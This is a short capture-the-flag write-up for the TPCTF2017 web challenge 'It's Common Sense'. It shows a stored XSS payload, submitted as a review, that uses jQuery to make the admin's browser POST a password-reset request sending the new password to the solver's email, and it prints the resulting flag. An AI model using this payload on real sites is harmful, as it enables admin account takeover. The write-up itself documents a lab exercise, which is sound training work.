[Web] TPCTF2017 - It's Common Sense


It’s Common Sense
100

Common Sense Reviews was fixed last night. If you believe you had a working sol. last night but did not receive an email, please retry that solution. One major issue was email sending.

We found this site: Common Sense Reviews

We think the site owners are related to Pirates. Please retrieve the admin password.

This challenge is not working right now, it should be back soon. If not, we will remove points received from it.This challenge should be working properly now. Expect a delay in receiving emails (approx. 3 minutes max?).

Author: Steven Su

A XSS challenge, we do have a register form and a login page, after signing up we can visit two forms in the account page, one is to sent a review to the admin, and the other is to reset the password (the new password was send to the email submitted in the form).

My first intuition was to try easiest thing that is to steal the session cookie, unfortunately this wouldn’t work because the session cookie was protected with a http only flag, which prevents it from being stolen with XSS. The solution was to instead of trying to get the cookies we can make the admin to submit the password reset form! We can do this this with Ajax/Jquery

The first line of the code is to import Jquery:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>

<script>
$( document ).ready(function() {
$.ajax({
type: "POST",
url: "/account",
data: 'email=s2020685%40mvrht.net&formbtn=Send%20Request',
success: function(data) {
console.log('success');
}
});
});
</script>

Submitting the form like this:



If we check our own review we can notice that the post request is being done correctly and the log message success is printed in the js console:


After a while we would receive an email with the flag:

1
Congratulations! Normally, you would've reset the administrators password. For the purposes of this challenge, the flag is tpctf{D1D_Y0U_N0t1c3_Common_Sense_Reviews_1s_P4R7_0F_CSRF_19210jka010920aff}